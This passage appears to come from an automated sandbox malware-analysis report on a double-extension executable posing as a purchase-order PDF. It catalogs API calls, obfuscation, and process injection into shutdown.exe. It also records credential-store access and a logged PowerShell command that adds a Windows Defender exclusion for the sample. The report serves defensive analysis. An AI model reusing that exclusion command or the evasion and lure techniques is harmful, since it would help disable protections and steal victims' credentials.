                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02FB2D30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02FB2D10
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB35C0 NtCreateMutant,LdrInitializeThunk,7_2_02FB35C0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB39B0 NtGetContextThread,LdrInitializeThunk,7_2_02FB39B0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2AB0 NtWaitForSingleObject,7_2_02FB2AB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2B80 NtQueryInformationFile,7_2_02FB2B80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2EA0 NtAdjustPrivilegesToken,7_2_02FB2EA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2E30 NtWriteVirtualMemory,7_2_02FB2E30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2FA0 NtQuerySection,7_2_02FB2FA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2F90 NtProtectVirtualMemory,7_2_02FB2F90
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2F60 NtCreateProcessEx,7_2_02FB2F60
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2CF0 NtOpenProcess,7_2_02FB2CF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2CC0 NtQueryVirtualMemory,7_2_02FB2CC0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2C00 NtQueryInformationProcess,7_2_02FB2C00
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2DB0 NtEnumerateKey,7_2_02FB2DB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2D00 NtSetInformationFile,7_2_02FB2D00
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3090 NtSetValueKey,7_2_02FB3090
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3010 NtOpenDirectoryObject,7_2_02FB3010
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3D70 NtOpenThread,7_2_02FB3D70
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB3D10 NtOpenProcessToken,7_2_02FB3D10
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E9350 NtReadFile,7_2_026E9350
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E91E0 NtCreateFile,7_2_026E91E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E9650 NtAllocateVirtualMemory,7_2_026E9650
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E9440 NtDeleteFile,7_2_026E9440
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026E94E0 NtClose,7_2_026E94E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FF097_2_0303FF09
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F89EB07_2_02F89EB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FFB17_2_0303FFB1
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F43FD57_2_02F43FD5
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F43FD27_2_02F43FD2
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F81F927_2_02F81F92
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03031D5A7_2_03031D5A
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03037D737_2_03037D73
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FF9C327_2_02FF9C32
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F9FDC07_2_02F9FDC0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F83D407_2_02F83D40
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FCF27_2_0303FCF2
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D1E807_2_026D1E80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CCFC07_2_026CCFC0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CCDA07_2_026CCDA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CCD977_2_026CCD97
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CB0407_2_026CB040
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CB1847_2_026CB184
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D37207_2_026D3720
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D371B7_2_026D371B
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D54E07_2_026D54E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026EBAD07_2_026EBAD0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDE2957_2_02DDE295
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDE3B37_2_02DDE3B3
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDE74C7_2_02DDE74C
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDCAB87_2_02DDCAB8
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDCA667_2_02DDCA66
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDD8187_2_02DDD818
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02F6B970 appears 280 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FB5130 appears 58 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FFF290 appears 105 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FC7E54 appears 111 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FEEA12 appears 86 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 011BF290 appears 105 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 01175130 appears 58 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 011AEA12 appears 86 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 01187E54 appears 111 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 0112B970 appears 280 times
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2037932132.0000000009540000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000000.2004703774.00000000002DC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexkXV.exe" vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2016717202.000000000086E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.000000000122D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSHUTDOWN.EXEj% vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSHUTDOWN.EXEj% vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe | Binary or memory string: OriginalFilenamexkXV.exe" vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New PO [FK4-7173].pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, ocmU7eNMB7cxPKDXQ0.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, ocmU7eNMB7cxPKDXQ0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, ocmU7eNMB7cxPKDXQ0.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, ocmU7eNMB7cxPKDXQ0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, ocmU7eNMB7cxPKDXQ0.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, ocmU7eNMB7cxPKDXQ0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@10/7@16/12
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New PO [FK4-7173].pdf.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhvjmyzg.vsv.ps1
                Source: New PO [FK4-7173].pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: shutdown.exe, 00000007.00000002.4472317980.00000000028BA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4472317980.00000000028C4000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4472317980.00000000028E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New PO [FK4-7173].pdf.exe | ReversingLabs: Detection: 52%
                Source: New PO [FK4-7173].pdf.exe | Virustotal: Detection: 33%
                Source: unknown | Process created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | Process created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe | Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
                Source: C:\Windows\SysWOW64\shutdown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
                Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe | Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\shutdown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: New PO [FK4-7173].pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New PO [FK4-7173].pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MKVNVRSuoK.exe, 00000006.00000002.4472639684.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4472854641.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdbGCTL source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New PO [FK4-7173].pdf.exe, New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdb source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.cs | .Net Code: JTpn9OjJvsO8Q3dG728 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.cs | .Net Code: JTpn9OjJvsO8Q3dG728 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.6fd0000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs | .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.cs | .Net Code: JTpn9OjJvsO8Q3dG728 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New PO [FK4-7173].pdf.exe.355e990.2.raw.unpack, XlF5VlCIHRSQX8M5eh.cs | .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: New PO [FK4-7173].pdf.exe, Static PE information: section name: .text entropy: 7.953409708030674
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack: High entropy of concatenated method names
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack: High entropy of concatenated method names
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack: High entropy of concatenated method names

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: Possible double extension: pdf.exe, Static PE information: New PO [FK4-7173].pdf.exe
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: New PO [FK4-7173].pdf.exe PID: 5592, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 4540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 7060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 6A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 8060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 96D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117096E rdtsc 4_2_0117096E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5714Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2492Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeWindow / User API: threadDelayed 2882Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeWindow / User API: threadDelayed 7090Jump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\shutdown.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe TID: 3628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep count: 2882 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep time: -5764000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep count: 7090 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep time: -14180000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep count: 43 > 30Jump to behavior
